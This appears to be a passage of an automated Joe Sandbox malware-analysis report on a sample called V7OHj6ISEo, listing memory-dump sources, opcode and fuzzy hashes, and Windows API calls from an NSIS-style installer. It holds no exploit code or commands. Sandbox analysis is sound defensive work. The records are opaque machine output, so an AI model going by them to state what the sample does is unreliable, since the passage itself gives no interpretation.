                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4cf89cf6422cb8f501cd797a697fa70c71ad3b79343ce17a389ca16ae6b7b25c
                                                                                                            • Instruction ID: 474e54fa146defcf1167d80b0f833cb2636dfe6fcdac3a689abd376d99b1f74f
                                                                                                            • Opcode Fuzzy Hash: 4cf89cf6422cb8f501cd797a697fa70c71ad3b79343ce17a389ca16ae6b7b25c
                                                                                                            • Instruction Fuzzy Hash: 4FD0A72114D3C80FD713C3347458659AF700F82140B0984D7E06DCF092D6454A4E8757
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 718e84124fc0a2af1728ed2877b43ceb823e5c1a4bd59cbf0317c48c5e0eb7ee
                                                                                                            • Instruction ID: 314ed221446ddc0bfb3617fc4b02861ccdd8ac607024e50fbd3a5e1d1326d26a
                                                                                                            • Opcode Fuzzy Hash: 718e84124fc0a2af1728ed2877b43ceb823e5c1a4bd59cbf0317c48c5e0eb7ee
                                                                                                            • Instruction Fuzzy Hash: DFC08C75000F098BF2082F50BC4CB39B7B8B707323FC82D10E00D038308BB85454CA44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1daa1387869ddf8bced23d245d0bd21255c6692dfcb198db3565dba6d3e33430
                                                                                                            • Instruction ID: 3319363e0e7fe97a1aa78b97cb3b993cb63dad529a1e42b5bde11895ee4f0fb7
                                                                                                            • Opcode Fuzzy Hash: 1daa1387869ddf8bced23d245d0bd21255c6692dfcb198db3565dba6d3e33430
                                                                                                            • Instruction Fuzzy Hash: B8C08C302683048FE240AA6DD884B5133ACEF85B04F0068E0F0088B626CA22FC004605
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fc4c08e720bc5861bdfe92d2f05feac68fdc4b92bc1c421bc05508cd4faea8e1
                                                                                                            • Instruction ID: d762a41c49331b4d1b50af18724e293d4fb7c0347c02fcefc763d705dc97c925
                                                                                                            • Opcode Fuzzy Hash: fc4c08e720bc5861bdfe92d2f05feac68fdc4b92bc1c421bc05508cd4faea8e1
                                                                                                            • Instruction Fuzzy Hash: CDC012344183044BD949F775EC46599732BD7C0500B409530B1091E66BAFB429975B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 83f790a94161a7fce968ab5226dda25e62b7b88371c3d01cb787cc43e31eafb3
                                                                                                            • Instruction ID: 961efa0342daefca1a51eb0a049f053220ee53a7e14d650c3c5f4ab996b7ed94
                                                                                                            • Opcode Fuzzy Hash: 83f790a94161a7fce968ab5226dda25e62b7b88371c3d01cb787cc43e31eafb3
                                                                                                            • Instruction Fuzzy Hash: BFC0123BA18211DFDB06CFA4D450B4FFFA2FBC4341F01C418A54423130C631A8519B52
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-334447862
                                                                                                            • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00437800,771B2EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$\*.*
                                                                                                            • API String ID: 2035342205-351390296
                                                                                                            • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-4082700204
                                                                                                            • Opcode ID: 913cd680b5638274bfda90b399a237e9ef82518298b0679d7632ec8816a11063
                                                                                                            • Instruction ID: 3ed35b0420a9b59d77b32dad8f90d7fc7572ee6baadef479e2d3500a474102fe
                                                                                                            • Opcode Fuzzy Hash: 913cd680b5638274bfda90b399a237e9ef82518298b0679d7632ec8816a11063
                                                                                                            • Instruction Fuzzy Hash: 00328074E00218CFEB64CF69D994B9DBBB2BF89300F1081A9D549AB361DB759E85CF10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-4082700204
                                                                                                            • Opcode ID: a6df15518be88e4f66f01096a45a93d4811acca26c732d68a14b0ae3292fa488
                                                                                                            • Instruction ID: d0810e882c3d16685d7ff68c6b4846621bd0b4aad8b1af9d265787c5584eca12
                                                                                                            • Opcode Fuzzy Hash: a6df15518be88e4f66f01096a45a93d4811acca26c732d68a14b0ae3292fa488
                                                                                                            • Instruction Fuzzy Hash: EB0291B4E003188FEB58CFA9C954BDDBBB2BB89300F1081A9D549AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: B5
                                                                                                            • API String ID: 0-3143426742
                                                                                                            • Opcode ID: 757a67cbd4af7d6aebd10ef58ed21e1b7f4241a5d7a66e19e2d8bc9d3482c532
                                                                                                            • Instruction ID: d9dfdceb50b84c02591ad2e89d1b480bc67bd570ec0efc8aec16ea96235b841c
                                                                                                            • Opcode Fuzzy Hash: 757a67cbd4af7d6aebd10ef58ed21e1b7f4241a5d7a66e19e2d8bc9d3482c532
                                                                                                            • Instruction Fuzzy Hash: 0E62AB74E01228CFDB64DF65C884BDDBBB2BB89311F1081E9E849AB255DB359E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a1fba0853b8e4c2481212858c5e023f351dc8729886b61e4d57b7c7d32dc1f5
                                                                                                            • Instruction ID: 3262a819b09d54142320f411b94095b51edee98570249cf5aed26401e72af6da
                                                                                                            • Opcode Fuzzy Hash: 8a1fba0853b8e4c2481212858c5e023f351dc8729886b61e4d57b7c7d32dc1f5
                                                                                                            • Instruction Fuzzy Hash: 4FC1A274E00218CFDB18DFA5D994B9DBBB2BF89300F2081A9D819BB355DB355A86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dcf6134a1a206025c302928eda2dc9ed955733ef87fe596cc75bab4599c5f032
                                                                                                            • Instruction ID: 1583af051fe950be41071876e4df87552a46f2ee105d9dd1525d75cddfb92a0b
                                                                                                            • Opcode Fuzzy Hash: dcf6134a1a206025c302928eda2dc9ed955733ef87fe596cc75bab4599c5f032
                                                                                                            • Instruction Fuzzy Hash: 49C1B174E00218CFDB18DFA5C994B9DBBB2BF89300F6081A9D809BB355DB359A85CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 820d1defd394b2ba85157f203c38c312c7c3b757680d97d1640bb0c135e614e8
                                                                                                            • Instruction ID: 0d8b787fd6e89367b1b535155b462c0c417281d9d522ad279809909dc2e4b085
                                                                                                            • Opcode Fuzzy Hash: 820d1defd394b2ba85157f203c38c312c7c3b757680d97d1640bb0c135e614e8
                                                                                                            • Instruction Fuzzy Hash: 9AC1A274E00218CFDB18DFA5D995B9DBBB2BF89300F6081A9D809AB355DB355E86CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1e5d2585a64158cf785079a3b56c9aba615264cea428fa1bbf2ebe2a68c5d8ae
                                                                                                            • Instruction ID: 7b795cbc8756614050acb322459be01be0febb45cf6a16a8b1c7a3e2b6e1bc31
                                                                                                            • Opcode Fuzzy Hash: 1e5d2585a64158cf785079a3b56c9aba615264cea428fa1bbf2ebe2a68c5d8ae
                                                                                                            • Instruction Fuzzy Hash: BFC19174E00218CFDB18DFA5D995B9DBBB2BF89300F2081A9D809BB355DB359A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a2c523233079632f0aa3ceb3fb4d95a8b0eb9f540b642634be58f79db891968
                                                                                                            • Instruction ID: 61b9ebc563092c188e2e589ca39b0dfa4520fca5db0feab7fcde08e3e24d78e1
                                                                                                            • Opcode Fuzzy Hash: 9a2c523233079632f0aa3ceb3fb4d95a8b0eb9f540b642634be58f79db891968
                                                                                                            • Instruction Fuzzy Hash: 52C19174E00218CFDB18DFA5D994B9DBBB2BF89300F2081A9D809BB355DB355A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3b25edf40cf043434b3b96a55f8293683c94defb760ed652f79a9b95c42041a5
                                                                                                            • Instruction ID: e2948f5a2eec3e49c5609d39aba900c08b8c541755a08e88fce2d03a6ce5e9c3
                                                                                                            • Opcode Fuzzy Hash: 3b25edf40cf043434b3b96a55f8293683c94defb760ed652f79a9b95c42041a5
                                                                                                            • Instruction Fuzzy Hash: 19C1A174E00258CFDB18DFA5D994B9DBBB2BF89300F2081A9D819AB355DB355E85CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 789bfc8d263bfa67903f6de37be07f49ca054c626ed138e5e62701bcf491029b
                                                                                                            • Instruction ID: 42aa98cd35cb958c2a34b7a843ac1cfe8a657bb54709235012f0b1b63eb2c188
                                                                                                            • Opcode Fuzzy Hash: 789bfc8d263bfa67903f6de37be07f49ca054c626ed138e5e62701bcf491029b
                                                                                                            • Instruction Fuzzy Hash: 69C1A074E00218CFDB58DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eef845f4e8c0ad0eb84cab012c05be4b05cbb22da1efbc3618183ff532efb583
                                                                                                            • Instruction ID: 7beed03e2f13d64265a9f38992f00ac6609743efd583d01111f0d9baa34c6ac3
                                                                                                            • Opcode Fuzzy Hash: eef845f4e8c0ad0eb84cab012c05be4b05cbb22da1efbc3618183ff532efb583
